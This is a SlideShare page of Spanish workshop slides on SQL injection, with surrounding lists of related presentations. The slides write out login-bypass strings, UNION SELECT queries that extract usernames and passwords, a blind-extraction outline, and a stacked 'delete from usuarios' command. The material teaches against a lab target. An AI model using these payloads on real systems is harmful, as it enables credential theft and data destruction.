SlideShare ist ein Scribd-Unternehmen logo

Sql injection

Carlos Rodallega
Carlos Rodallega
Technologie
1 von 27
Downloaden Sie, um offline zu lesen
 Problemas de configuración del servidor.  Bugs en los modulos del framework usado en el sitio (Actualizaciones)  Problemas en la lógica del negocio › Manejo incorrecto de archivos. › Mal filtrado de variables.
 Problemas en la lógica del negocio › Mal filtrado de variables .  $login=$_POST['login'];  $login <- roguer  $login <- ‘
 Internamente › SELECT * FROM usuarios WHERE nombre= „$login‟ AND password=„$pass‟ SELECT * FROM usuarios WHERE nombre = „roguer‟ AND password=„contrasena‟ SELECT * FROM usuarios WHERE nombre = „‟‟ AND password=„‟‟
 Paginas de inicio de sesión › Nombre de Usuario › Contraseña  http://mi_ip/Taller
„or‟‟=„ „or‟1‟=„1 Select * from usuarios where nombre=„„or‟‟=„‟ AND password=„„or‟‟=„‟
 Operaciones sobre consultas › Order by › Union › Limit
 Pagina que gestiona el contenido de una base de datos. › Paginas que contienen un parámetro tipo id › ¿ Y si hacemos que ese sea id=„ ? “Error”
 ¿Se esta consultando una tabla de la base de datos?  ¿Nos muestra algún error?  Que nos sirve saber acerca de la tabla consultada?
 Obteniendo el numero de columnas › Pagina.php?id=-1+order+by+X—  ¿Porque -1?  ¿Que hace el order by en esta consulta?  ¿Como puedo obtener un resultado de la inyección?
 Obteniendo un resultado visible en el sitio. › Pagina.php?id=- 1+union+select+1,2,3.,.,n— › ¿Cual es la diferencia ahora? › ¿Para que esos números?
 Funciones de mysql › Version() › User() › Database() › Concat()
 Obteniendo información de la conexión. › Pagina.php?id=- 1+union+select+1,user(),3.,.,n— › ¿Cual es la diferencia ahora? › ¿Qué resultado arrojó?
 Malicia Indígena o information.schema. › Pagina.php?id=-1+union+ select+1,2,3.,.,n+from+tabla— › ¿Qué resultado arrojó?
 ¿Si tengo el nombre de la tabla y las columnas que puedo hacer?  Pagina.php?id=-1+union+select+1,login,pass, ...,n+from+usuarios—  ¿Cómo paso al siguiente registro?
 ¿Y si la pagina no genera errores al hacer id=„?
 Estructura de la consulta › SELECT * FROM noticias WHERE id=$id › SELECT * FROM noticias WHERE id=5 › SELECT * FROM noticias WHERE id=5 AND 1=1
 Concepto de Subconsultas › SELECT count(*) FROM tabla › SELECT count(campo) FROM tabla › SELECT * FROM noticias WHERE id=5 AND 1=1
 Uniendo campos y usando operadores › SELECT concat(login,0x3a,password) FROM usuarios LIMIT 0,1 › substring(campo,carater_inicio,tamaño) › substring(campo,1,1) › Ascii(caracter)
 ¿Toca sacar carácter por carácter?  ¿Cómo se cuantos caracteres debo sacar?
 ¿Es esto critico?  ¿Para puede servir esta información?  ¿A través de SQL-Inyection solo se puede sacar información? › login=‘roguer’;delete from usuarios--
Sql injection
Sql injection

Empfohlen

Sql injection
Sql injectionSql injection
Sql injectionMinoxx
 
Inyeccion de codigo
Inyeccion de codigoInyeccion de codigo
Inyeccion de codigoFederico Hernández González
 
Hacking ético
Hacking éticoHacking ético
Hacking éticosony_e
 
Sql Injection
Sql InjectionSql Injection
Sql InjectionLeonardo Raygoza
 
Hacking etico
Hacking eticoHacking etico
Hacking eticoHacking etico
 
Seguridad sql injection
Seguridad sql injectionSeguridad sql injection
Seguridad sql injectionGary Briceño
 
Vulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHPVulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHPMoises Silva
 
INYECCION SQL(SEGURIDAD DE LA INFORMACION)
INYECCION SQL(SEGURIDAD DE LA INFORMACION)INYECCION SQL(SEGURIDAD DE LA INFORMACION)
INYECCION SQL(SEGURIDAD DE LA INFORMACION)toshko86
 

Empfohlen

Sql injection
Sql injectionSql injection
Sql injectionMinoxx
 
Inyeccion de codigo
Inyeccion de codigoInyeccion de codigo
Inyeccion de codigoFederico Hernández González
 
Hacking ético
Hacking éticoHacking ético
Hacking éticosony_e
 
Sql Injection
Sql InjectionSql Injection
Sql InjectionLeonardo Raygoza
 
Hacking etico
Hacking eticoHacking etico
Hacking eticoHacking etico
 
Seguridad sql injection
Seguridad sql injectionSeguridad sql injection
Seguridad sql injectionGary Briceño
 
Vulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHPVulnerabilidades en Aplicaciones Web PHP
Vulnerabilidades en Aplicaciones Web PHPMoises Silva
 
INYECCION SQL(SEGURIDAD DE LA INFORMACION)
INYECCION SQL(SEGURIDAD DE LA INFORMACION)INYECCION SQL(SEGURIDAD DE LA INFORMACION)
INYECCION SQL(SEGURIDAD DE LA INFORMACION)toshko86
 
Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...
Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...
Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...White Hat Mexico
 
Expo hacking etico
Expo hacking eticoExpo hacking etico
Expo hacking eticoVicente Lingan
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical HackingHacking Bolivia
 
introduccion Hacking etico
introduccion Hacking eticointroduccion Hacking etico
introduccion Hacking eticoYulder Bermeo
 
Ataque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffingAtaque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffingMagda Mayery Baquero Cardona
 
Hacking en aplicaciones web
Hacking en aplicaciones webHacking en aplicaciones web
Hacking en aplicaciones webHacking Bolivia
 
Integridad Y Seguridad En Las Bases De Datos
Integridad Y Seguridad En Las Bases De DatosIntegridad Y Seguridad En Las Bases De Datos
Integridad Y Seguridad En Las Bases De DatosDrakonis11
 
Gonzalo lopez miranda
Gonzalo lopez mirandaGonzalo lopez miranda
Gonzalo lopez mirandaGonzalo Lopez Miranda
 
(In) seguridad web
(In) seguridad web(In) seguridad web
(In) seguridad webEventos Creativos
 
Hacking ético en aplicaciones web [SQL Injection]
Hacking ético en aplicaciones web [SQL Injection]Hacking ético en aplicaciones web [SQL Injection]
Hacking ético en aplicaciones web [SQL Injection]Eduardo Arriols Nuñez
 
SolidQ Summit 2018 - Todo lo que un integrador de datos debería tener... y pa...
SolidQ Summit 2018 - Todo lo que un integrador de datos debería tener... y pa...SolidQ Summit 2018 - Todo lo que un integrador de datos debería tener... y pa...
SolidQ Summit 2018 - Todo lo que un integrador de datos debería tener... y pa...SolidQ
 
Mejores prácticas desarrollo de base de datos
Mejores prácticas desarrollo de base de datos Mejores prácticas desarrollo de base de datos
Mejores prácticas desarrollo de base de datos Eduardo Castro
 
Escribiendo código T-SQL eficientemente
Escribiendo código T-SQL eficientementeEscribiendo código T-SQL eficientemente
Escribiendo código T-SQL eficientementeJoseph Lopez
 
Asegúr@IT 7: Serialized SQL Injection
Asegúr@IT 7: Serialized SQL InjectionAsegúr@IT 7: Serialized SQL Injection
Asegúr@IT 7: Serialized SQL InjectionChema Alonso
 
2 Tips SEO Fáciles y Útiles - Marzo
2 Tips SEO Fáciles y Útiles - Marzo 2 Tips SEO Fáciles y Útiles - Marzo
2 Tips SEO Fáciles y Útiles - Marzo Martin Noziglia
 
Base de datos dinamicas
Base de datos dinamicasBase de datos dinamicas
Base de datos dinamicasel_rosales
 
Introducción a DJango
Introducción a DJangoIntroducción a DJango
Introducción a DJangoLuis Cruz Campos
 
52 sacándole jugo al objeto query
52 sacándole jugo al objeto query52 sacándole jugo al objeto query
52 sacándole jugo al objeto queryGeneXus
 
052 sacándole jugo al objeto query
052 sacándole jugo al objeto query052 sacándole jugo al objeto query
052 sacándole jugo al objeto queryGeneXus
 
052 sacándole jugo al objeto query
052 sacándole jugo al objeto query052 sacándole jugo al objeto query
052 sacándole jugo al objeto queryGeneXus
 
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxEVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxJorgeParada26
 
Buenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxBuenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxFederico Castellari
 

Weitere ähnliche Inhalte

Andere mochten auch

Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...
Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...
Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...White Hat Mexico
 
introduccion Hacking etico
introduccion Hacking eticointroduccion Hacking etico
introduccion Hacking eticoYulder Bermeo
 
Hacking en aplicaciones web
Hacking en aplicaciones webHacking en aplicaciones web
Hacking en aplicaciones webHacking Bolivia
 
Integridad Y Seguridad En Las Bases De Datos
Integridad Y Seguridad En Las Bases De DatosIntegridad Y Seguridad En Las Bases De Datos
Integridad Y Seguridad En Las Bases De DatosDrakonis11
 

Andere mochten auch (7)

Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...
Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...
Manual de pentesting_sobre_ataque_a_servidores_apache_1.x_2.x_con_linux_y_per...
 
Expo hacking etico
Expo hacking eticoExpo hacking etico
Expo hacking etico
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
introduccion Hacking etico
introduccion Hacking eticointroduccion Hacking etico
introduccion Hacking etico
 
Ataque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffingAtaque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffing
 
Hacking en aplicaciones web
Hacking en aplicaciones webHacking en aplicaciones web
Hacking en aplicaciones web
 
Integridad Y Seguridad En Las Bases De Datos
Integridad Y Seguridad En Las Bases De DatosIntegridad Y Seguridad En Las Bases De Datos
Integridad Y Seguridad En Las Bases De Datos
 

Ähnlich wie Sql injection

Hacking ético en aplicaciones web [SQL Injection]
Hacking ético en aplicaciones web [SQL Injection]Hacking ético en aplicaciones web [SQL Injection]
Hacking ético en aplicaciones web [SQL Injection]Eduardo Arriols Nuñez
 
SolidQ Summit 2018 - Todo lo que un integrador de datos debería tener... y pa...
SolidQ Summit 2018 - Todo lo que un integrador de datos debería tener... y pa...SolidQ Summit 2018 - Todo lo que un integrador de datos debería tener... y pa...
SolidQ Summit 2018 - Todo lo que un integrador de datos debería tener... y pa...SolidQ
 
Mejores prácticas desarrollo de base de datos
Mejores prácticas desarrollo de base de datos Mejores prácticas desarrollo de base de datos
Mejores prácticas desarrollo de base de datos Eduardo Castro
 
Escribiendo código T-SQL eficientemente
Escribiendo código T-SQL eficientementeEscribiendo código T-SQL eficientemente
Escribiendo código T-SQL eficientementeJoseph Lopez
 
Asegúr@IT 7: Serialized SQL Injection
Asegúr@IT 7: Serialized SQL InjectionAsegúr@IT 7: Serialized SQL Injection
Asegúr@IT 7: Serialized SQL InjectionChema Alonso
 
2 Tips SEO Fáciles y Útiles - Marzo
2 Tips SEO Fáciles y Útiles - Marzo 2 Tips SEO Fáciles y Útiles - Marzo
2 Tips SEO Fáciles y Útiles - Marzo Martin Noziglia
 
Base de datos dinamicas
Base de datos dinamicasBase de datos dinamicas
Base de datos dinamicasel_rosales
 
52 sacándole jugo al objeto query
52 sacándole jugo al objeto query52 sacándole jugo al objeto query
52 sacándole jugo al objeto queryGeneXus
 
052 sacándole jugo al objeto query
052 sacándole jugo al objeto query052 sacándole jugo al objeto query
052 sacándole jugo al objeto queryGeneXus
 
052 sacándole jugo al objeto query
052 sacándole jugo al objeto query052 sacándole jugo al objeto query
052 sacándole jugo al objeto queryGeneXus
 

Ähnlich wie Sql injection (13)

Gonzalo lopez miranda
Gonzalo lopez mirandaGonzalo lopez miranda
Gonzalo lopez miranda
 
(In) seguridad web
(In) seguridad web(In) seguridad web
(In) seguridad web
 
Hacking ético en aplicaciones web [SQL Injection]
Hacking ético en aplicaciones web [SQL Injection]Hacking ético en aplicaciones web [SQL Injection]
Hacking ético en aplicaciones web [SQL Injection]
 
SolidQ Summit 2018 - Todo lo que un integrador de datos debería tener... y pa...
SolidQ Summit 2018 - Todo lo que un integrador de datos debería tener... y pa...SolidQ Summit 2018 - Todo lo que un integrador de datos debería tener... y pa...
SolidQ Summit 2018 - Todo lo que un integrador de datos debería tener... y pa...
 
Mejores prácticas desarrollo de base de datos
Mejores prácticas desarrollo de base de datos Mejores prácticas desarrollo de base de datos
Mejores prácticas desarrollo de base de datos
 
Escribiendo código T-SQL eficientemente
Escribiendo código T-SQL eficientementeEscribiendo código T-SQL eficientemente
Escribiendo código T-SQL eficientemente
 
Asegúr@IT 7: Serialized SQL Injection
Asegúr@IT 7: Serialized SQL InjectionAsegúr@IT 7: Serialized SQL Injection
Asegúr@IT 7: Serialized SQL Injection
 
2 Tips SEO Fáciles y Útiles - Marzo
2 Tips SEO Fáciles y Útiles - Marzo 2 Tips SEO Fáciles y Útiles - Marzo
2 Tips SEO Fáciles y Útiles - Marzo
 
Base de datos dinamicas
Base de datos dinamicasBase de datos dinamicas
Base de datos dinamicas
 
Introducción a DJango
Introducción a DJangoIntroducción a DJango
Introducción a DJango
 
52 sacándole jugo al objeto query
52 sacándole jugo al objeto query52 sacándole jugo al objeto query
52 sacándole jugo al objeto query
 
052 sacándole jugo al objeto query
052 sacándole jugo al objeto query052 sacándole jugo al objeto query
052 sacándole jugo al objeto query
 
052 sacándole jugo al objeto query
052 sacándole jugo al objeto query052 sacándole jugo al objeto query
052 sacándole jugo al objeto query
 

Kürzlich hochgeladen

EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxEVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxJorgeParada26
 
Buenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxBuenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxFederico Castellari
 
Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21mariacbr99
 
Avances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanaAvances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanamcerpam
 
How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.FlorenciaCattelani
 
redes informaticas en una oficina administrativa
redes informaticas en una oficina administrativaredes informaticas en una oficina administrativa
redes informaticas en una oficina administrativanicho110
 
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...JohnRamos830530
 
Guia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosGuia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosJhonJairoRodriguezCe
 
investigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIinvestigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIhmpuellon
 
Avances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estosAvances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estossgonzalezp1
 

Kürzlich hochgeladen (10)

EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxEVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
 
Buenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxBuenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptx
 
Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21
 
Avances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanaAvances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvana
 
How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.
 
redes informaticas en una oficina administrativa
redes informaticas en una oficina administrativaredes informaticas en una oficina administrativa
redes informaticas en una oficina administrativa
 
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
 
Guia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosGuia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos Basicos
 
investigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIinvestigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXI
 
Avances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estosAvances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estos
 

Sql injection

  • 1.
  • 2. Problemas de configuración del servidor.  Bugs en los modulos del framework usado en el sitio (Actualizaciones)  Problemas en la lógica del negocio › Manejo incorrecto de archivos. › Mal filtrado de variables.
  • 3.
  • 4.
  • 5.
  • 6.
  • 7. Problemas en la lógica del negocio › Mal filtrado de variables .  $login=$_POST['login'];  $login <- roguer  $login <- ‘
  • 8. Internamente › SELECT * FROM usuarios WHERE nombre= „$login‟ AND password=„$pass‟ SELECT * FROM usuarios WHERE nombre = „roguer‟ AND password=„contrasena‟ SELECT * FROM usuarios WHERE nombre = „‟‟ AND password=„‟‟
  • 9. Paginas de inicio de sesión › Nombre de Usuario › Contraseña  http://mi_ip/Taller
  • 10. „or‟‟=„ „or‟1‟=„1 Select * from usuarios where nombre=„„or‟‟=„‟ AND password=„„or‟‟=„‟
  • 11. Operaciones sobre consultas › Order by › Union › Limit
  • 12. Pagina que gestiona el contenido de una base de datos. › Paginas que contienen un parámetro tipo id › ¿ Y si hacemos que ese sea id=„ ? “Error”
  • 13. ¿Se esta consultando una tabla de la base de datos?  ¿Nos muestra algún error?  Que nos sirve saber acerca de la tabla consultada?
  • 14. Obteniendo el numero de columnas › Pagina.php?id=-1+order+by+X—  ¿Porque -1?  ¿Que hace el order by en esta consulta?  ¿Como puedo obtener un resultado de la inyección?
  • 15. Obteniendo un resultado visible en el sitio. › Pagina.php?id=- 1+union+select+1,2,3.,.,n— › ¿Cual es la diferencia ahora? › ¿Para que esos números?
  • 16. Funciones de mysql › Version() › User() › Database() › Concat()
  • 17. Obteniendo información de la conexión. › Pagina.php?id=- 1+union+select+1,user(),3.,.,n— › ¿Cual es la diferencia ahora? › ¿Qué resultado arrojó?
  • 18. Malicia Indígena o information.schema. › Pagina.php?id=-1+union+ select+1,2,3.,.,n+from+tabla— › ¿Qué resultado arrojó?
  • 19. ¿Si tengo el nombre de la tabla y las columnas que puedo hacer?  Pagina.php?id=-1+union+select+1,login,pass, ...,n+from+usuarios—  ¿Cómo paso al siguiente registro?
  • 20. ¿Y si la pagina no genera errores al hacer id=„?
  • 21. Estructura de la consulta › SELECT * FROM noticias WHERE id=$id › SELECT * FROM noticias WHERE id=5 › SELECT * FROM noticias WHERE id=5 AND 1=1
  • 22. Concepto de Subconsultas › SELECT count(*) FROM tabla › SELECT count(campo) FROM tabla › SELECT * FROM noticias WHERE id=5 AND 1=1
  • 23. Uniendo campos y usando operadores › SELECT concat(login,0x3a,password) FROM usuarios LIMIT 0,1 › substring(campo,carater_inicio,tamaño) › substring(campo,1,1) › Ascii(caracter)
  • 24. ¿Toca sacar carácter por carácter?  ¿Cómo se cuantos caracteres debo sacar?
  • 25. ¿Es esto critico?  ¿Para puede servir esta información?  ¿A través de SQL-Inyection solo se puede sacar información? › login=‘roguer’;delete from usuarios--